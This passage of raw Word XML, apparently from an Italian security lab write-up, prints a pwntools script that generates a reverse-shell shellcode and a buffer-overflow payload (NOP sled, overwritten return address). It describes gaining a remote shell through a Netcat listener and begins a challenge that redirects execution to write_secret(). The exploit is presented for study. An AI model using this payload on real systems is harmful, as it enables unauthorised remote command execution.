      <w:r w:rsidR="0034013D">
        <w:t xml:space="preserve">il codice della reverse shellcode tradotta opportunamente, una serie di NOP sled e infine poniamo come indirizzo di ritorno </w:t>
      </w:r>
      <w:r w:rsidR="00F77C4B">
        <w:t xml:space="preserve">l’indirizzo rsp </w:t>
      </w:r>
      <w:r w:rsidR="00CA158F">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00F77C4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA158F">
        <w:t>offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E02BB68" w14:textId="1F008085" w:rsidR="00790328" w:rsidRDefault="00C942E4" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:r w:rsidR="00336933">
        <w:t>codice dello</w:t>
      </w:r>
      <w:r w:rsidR="00CA158F">
        <w:t xml:space="preserve"> script chiamato </w:t>
      </w:r>
      <w:r w:rsidR="00CA158F" w:rsidRPr="00790328">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00790328" w:rsidRPr="007F2770">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>gen_shellcode.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004B27BA" w:rsidRPr="00790328">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004B27BA">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55690F6D"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4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A819D1E"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 2.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19755D8B"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CC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46926893"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 4.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2A963"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 5. context.arch=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'amd64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE940F0"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 6. context.os=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'linux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D0855"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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 7.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E59A38"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 8.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A1B33"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4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#Shellcode for reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D270F5"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10. s_code = shellcraft.amd64.linux.connect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'127.0.0.1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>) + shellcraft.amd64.linux.dupsh(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'rbp'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144438A"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11.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DFEB7D"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t># Shellcode for printing "Hello world!!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3359D288"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#s_code = shellcraft.amd64.linux.echo('Hello world!!') + shellcraft.amd64.linux.exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE871F"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14.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C27054"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15. log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Shellcode ready"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C059B"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DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(s_code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FE2E6"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17.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C0785A"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18. s_code_asm = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(s_code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D61CFD"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19. log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Shellcode length: %d bytes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> % len(s_code_asm))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122FF56"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20.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA4F85"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D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t># Return address in little endian format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB993E1"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22. offset=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B149A"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23. ret_addr = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>0x7fffffffd968</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> - offset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17022726"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24. addr = p64(ret_addr, endian=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'little'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4900E"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25. log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Return address: %#.16x"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> % (ret_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C374C37"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26.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073BFBC"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27.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F5C8D"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28. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t># Opcode for the NOP instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE4B1C"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29. nop = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'nop'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>, arch=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"amd64"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F472B9"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30.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1FF4B"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31.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BC326"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32. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D4D0AB"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t># Writes payload on a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A8005"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33. payloadInit=b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"2\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DF2FE"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34. payload =payloadInit + nop*(offset - len(s_code_asm) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>) + s_code_asm + nop*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> + addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFD670"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35. log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Payload ready"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD24A33"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36.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01755342"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37.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07BE75"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38. shellcode_file = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"./shellcode_payload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2239CF"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39.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510C575"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 xml:space="preserve">40. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> open(shellcode_file, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"wb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73D021"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41.         f.write(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904456C"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42.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E82C5B"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43. log.info(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="ABE338"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Payload saved into %s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> % shellcode_file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA7D04" w14:textId="77777777" w:rsidR="00453D44" w:rsidRDefault="00453D4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3406960"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>44.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578474B7" w14:textId="247F4425" w:rsidR="00790328" w:rsidRDefault="00790328" w:rsidP="00790328"/>
    <w:p w14:paraId="3806CD5F" w14:textId="3A88D6AA" w:rsidR="00DA74A2" w:rsidRDefault="00E85785" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo quindi uno screen dell’attacco effettuato utilizzando </w:t>
      </w:r>
      <w:r w:rsidR="00884336">
        <w:t xml:space="preserve">lo </w:t>
      </w:r>
      <w:r w:rsidR="00884336" w:rsidRPr="00884336">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00884336" w:rsidRPr="007F2770">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>shellcode_payload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00884336" w:rsidRPr="00884336">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00884336">
        <w:t>generato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7E97F" w14:textId="77777777" w:rsidR="004C7C2D" w:rsidRDefault="004C7C2D" w:rsidP="00790328">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692D954D" w14:textId="3B856170" w:rsidR="00884336" w:rsidRDefault="004C7C2D" w:rsidP="004C7C2D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24B6F503" wp14:editId="2AA4DB8F">
            <wp:extent cx="6704974" cy="2196936"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="7" name="Immagin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8" t="13989" b="31165"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6728229" cy="2204556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B9865" w14:textId="7B9FBF41" w:rsidR="004C7C2D" w:rsidRDefault="00CE550A" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE550A">
        <w:t xml:space="preserve">Il programma continua la sua esecuzione in modo regolare e si connette all'indirizzo specificato su cui si è in ascolto con Netcat </w:t>
      </w:r>
      <w:r w:rsidR="00C667CE">
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE550A">
        <w:t xml:space="preserve"> un altro dispositivo. Questo ci permette di utilizzare la shell per eseguire qualsiasi comando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> da remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE550A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B06BCF" w14:textId="13EE3C2C" w:rsidR="00FB77DE" w:rsidRDefault="00961F4D" w:rsidP="00170F5D">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc140165777"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3 Challenge write_secret</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="13AD6590" w14:textId="6236B371" w:rsidR="000D5080" w:rsidRDefault="00FA18E3" w:rsidP="000D40C2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>Attaccare di nuovo la vulnerabilità, fare eseguire la funzione "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>write_secret()</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8D4E3" w14:textId="2E811BA2" w:rsidR="00961F4D" w:rsidRDefault="000D5080" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sfruttiamo la precedente vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="000D40C2">
        <w:t xml:space="preserve">à ma questa volta facciamo </w:t>
      </w:r>
      <w:r w:rsidR="00B91CFE">
        <w:t xml:space="preserve">eseguire la funzione write_secret() </w:t>
      </w:r>
      <w:r w:rsidR="00D022B9">
        <w:t>che normalmente non verrebbe mai chiamata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218A556" w14:textId="77777777" w:rsidR="00523C45" w:rsidRDefault="00D022B9" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizzando il debugger gdb </w:t>
      </w:r>
      <w:r w:rsidR="00ED17CB">
        <w:t>per scoprire l’indirizzo di write_secret da inserire come indirizzo di ritorno.</w:t>
      </w:r>
      <w:r w:rsidR="006B1E23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C09C028" w14:textId="77777777" w:rsidR="001078DD" w:rsidRDefault="001078DD" w:rsidP="00523C45">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737D6D4C" w14:textId="633DFC6D" w:rsidR="00D022B9" w:rsidRDefault="00474FC2" w:rsidP="00523C45">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07F1142D" wp14:editId="2E138CD9">
            <wp:extent cx="6643220" cy="2882232"/>
